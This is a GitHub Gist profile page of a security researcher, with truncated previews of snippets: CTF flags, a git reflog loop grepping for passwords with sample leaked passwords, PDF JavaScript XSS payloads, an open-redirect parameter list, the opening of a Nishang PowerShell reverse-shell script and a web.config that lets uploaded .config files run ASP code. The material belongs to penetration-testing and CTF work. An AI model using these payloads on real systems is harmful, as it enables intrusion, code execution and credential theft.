Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

Aj Dumanhug ajdumanhug

🏠
Working from home
View GitHub Profile
View dontmindme.json
[
{
"text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
"author": "AJ Dumanhug"
}
]
View Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@ajdumanhug
ajdumanhug / pdf.txt
Created Jan 28, 2021
App Object for PDF
View pdf.txt
app.alert\("XSS"\);
app.response\("XSS"\);
app.launchURL\("https://example.com"\);
Other Methods:
- browseForDoc
View chall.py
important = ""
pip_important = "flag{h4ckst33tb0ys}"
import base64
randomvar = important.encode('ascii')
important_tottaly = base64.b64encode(randomvar)
import random
nothin_important = important_tottaly.decode('ascii')
pip_important = ""
supa_strong = ""
for n in nothin_important:
@ajdumanhug
ajdumanhug / cta.type
Created Nov 12, 2020
call_to_action[type] for Facebook Pages
View cta.type
BOOK_TRAVEL, CONTACT_US, DONATE, DONATE_NOW, DOWNLOAD, GET_DIRECTIONS, GO_LIVE, INTERESTED, LEARN_MORE, LIKE_PAGE, MESSAGE_PAGE, SAVE, SEND_TIP, SHOP_NOW, SIGN_UP, VIEW_INSTAGRAM_PROFILE, INSTAGRAM_MESSAGE, LOYALTY_LEARN_MORE, PURCHASE_GIFT_CARDS, PAY_TO_ACCESS, GET_MOBILE_APP, INSTALL_MOBILE_APP, USE_MOBILE_APP, INSTALL_APP, USE_APP, PLAY_GAME, WATCH_VIDEO, WATCH_MORE, OPEN_LINK, NO_BUTTON, LISTEN_MUSIC, MOBILE_DOWNLOAD, GET_OFFER, GET_OFFER_VIEW, BUY_NOW, BUY_TICKETS, UPDATE_APP, BET_NOW, ADD_TO_CART, ORDER_NOW, SELL_NOW, GET_SHOWTIMES, LISTEN_NOW, GET_EVENT_TICKETS, SEARCH_MORE, PRE_REGISTER, SWIPE_UP_PRODUCT, SWIPE_UP_SHOP, CALL, MISSED_CALL, CALL_NOW, CALL_ME, APPLY_NOW, BUY, GET_QUOTE, SUBSCRIBE, RECORD_NOW, VOTE_NOW, GIVE_FREE_RIDES, REGISTER_NOW, OPEN_MESSENGER_EXT, EVENT_RSVP, CIVIC_ACTION, SEND_INVITES, REFER_FRIENDS, REQUEST_TIME, SEE_MENU, WHATSAPP_MESSAGE, SEARCH, TRY_IT, TRY_ON, LINK_CARD, DIAL_CODE, FIND_YOUR_GROUPS
View fb.ip
enable_tc_mode
guest-access traffic-class internet internet
guest-access traffic-class 1 name xwf
guest-access traffic-class 1 permit *.expresswifi.com
guest-access traffic-class 1 permit xwf-static.xx.fbcdn.net
guest-access traffic-class 1 permit xwf-scontent.xx.fbcdn.net
guest-access traffic-class 1 permit xwf.facebook.com
guest-access traffic-class 1 permit *.xwf.fyi
guest-access traffic-class 1 permit h.facebook.com
guest-access traffic-class 1 permit graph.expresswifi.com
@ajdumanhug
ajdumanhug / openredirection.payloads
Created Jul 31, 2020
List of parameters for Open Redirection
View openredirection.payloads
dest
redirect
uri
path
continue
url
window
next
data
reference
@ajdumanhug
ajdumanhug / openredirection.payloads
Created Jul 31, 2020
List of parameters for Open Redirection
View openredirection.payloads
dest
redirect
uri
path
continue
url
window
next
data
reference
@ajdumanhug
ajdumanhug / shell.ps1
Created Jun 8, 2020
Reverse Shell using Nishang
View shell.ps1
function Invoke-PowerShellTcp
{
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
@ajdumanhug
ajdumanhug / web.config
Created Jun 8, 2020
web.config with vb script
View web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />